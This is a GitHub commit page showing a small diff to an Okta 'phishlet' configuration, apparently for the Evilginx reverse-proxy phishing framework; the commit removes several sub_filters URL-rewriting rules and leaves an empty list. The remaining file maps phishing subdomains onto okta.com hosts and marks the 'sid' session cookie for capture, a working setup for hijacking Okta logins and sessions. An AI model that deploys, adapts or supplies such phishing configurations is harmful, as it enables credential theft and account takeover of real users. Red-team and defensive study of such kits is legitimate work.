Skip to content

Commit

Permalink
Update okta.yaml
Browse files Browse the repository at this point in the history
Updating to remove sub_filters with an empty array
  • Loading branch information
ahhh authored Jan 22, 2019
1 parent 33a9e49 commit 6b85c14
Showing 1 changed file with 1 addition and 5 deletions.
6 changes: 1 addition & 5 deletions phishlets/okta.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -4,11 +4,7 @@ proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
- {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
sub_filters:
- {triggers_on: 'EXAMPLE.okta.com', orig_sub: 'EXAMPLE', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}
- {triggers_on: 'login.okta.com', orig_sub: '', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
- {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'https\\x3A\\x2F\\x2F{hostname}', replace: 'https\x3A\x2F\x2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
- {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: '\\x2Fuser\\x2Fnotifications', replace: 'https\x3A\x2F\x2FEXAMPLE.okta.com\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
sub_filters: []
auth_tokens:
- domain: 'EXAMPLE.okta.com'
keys: ['sid']
Expand Down

0 comments on commit 6b85c14

Please sign in to comment.